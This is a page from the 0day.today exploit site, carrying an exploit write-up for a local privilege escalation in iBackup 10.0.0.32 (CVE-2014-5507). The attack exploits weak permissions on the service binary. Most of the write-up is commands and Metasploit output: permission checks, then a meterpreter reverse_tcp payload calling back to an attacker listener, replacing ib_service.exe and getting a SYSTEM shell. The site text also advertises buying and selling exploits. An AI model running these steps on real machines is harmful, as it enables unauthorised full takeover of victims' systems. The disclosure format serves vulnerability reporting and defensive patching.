0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
iBackup 10.0.0.32 - Local Privilege Escalation Vulnerability
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: iBackup <= 10.0.0.32 Local Privilege Escalation # Date: 23/01/2014 # Author: Glafkos Charalambous <glafkos.charalambous[at]unithreat.com> # Version: 10.0.0.32 # Vendor: IBackup # Vendor URL: https://www.ibackup.com/ # CVE-2014-5507 Vulnerability Details There are weak permissions for IBackupWindows default installation where everyone is allowed to change the ib_service.exe with an executable of their choice. When the service restarts or the system reboots the attacker payload will execute on the system with SYSTEM privileges. C:\Users\0x414141>icacls "C:\Program Files\IBackupWindows\ib_service.exe" C:\Program Files\IBackupWindows\ib_service.exe Everyone:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Successfully processed 1 files; Failed processing 0 files C:\Users\0x414141>sc qc IBService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: IBService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\IBackupWindows\ib_service.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IBackup Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem msf exploit(service_permissions) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 0x414141-PC\0x414141 @ 0x414141-PC 192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102) msf exploit(service_permissions) > show options Module options (exploit/windows/local/service_permissions): Name Current Setting Required Description ---- --------------- -------- ----------- AGGRESSIVE true no Exploit as many services as possible (dangerous) SESSION 1 yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none) LHOST 192.168.0.100 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(service_permissions) > exploit [*] Started reverse handler on 192.168.0.100:4444 [*] Meterpreter stager executable 15872 bytes long being uploaded.. [*] Trying to add a new service... [*] No privs to create a service... [*] Trying to find weak permissions in existing services.. [*] IBService has weak file permissions - C:\Program Files\IBackupWindows\ib_service.exe moved to C:\Program Files\IBackupWindows\ib_service.exe.bak and replaced. [*] Restarting IBService [*] Could not restart IBService. Wait for a reboot. (or force one yourself) Upon Reboot or Service Restart [*] Sending stage (770048 bytes) to 192.168.0.102 [*] Meterpreter session 2 opened (192.168.0.100:4444 -> 192.168.0.102:14852) at 2014-07-21 00:52:36 +0300 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > background [*] Backgrounding session 2... msf exploit(service_permissions) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 0x414141-PC\0x414141 @ 0x414141-PC 192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102) 2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ 0x414141-PC 192.168.0.100:4444 -> 192.168.0.102:14852 (192.168.0.102) # 0day.today [2024-12-25] #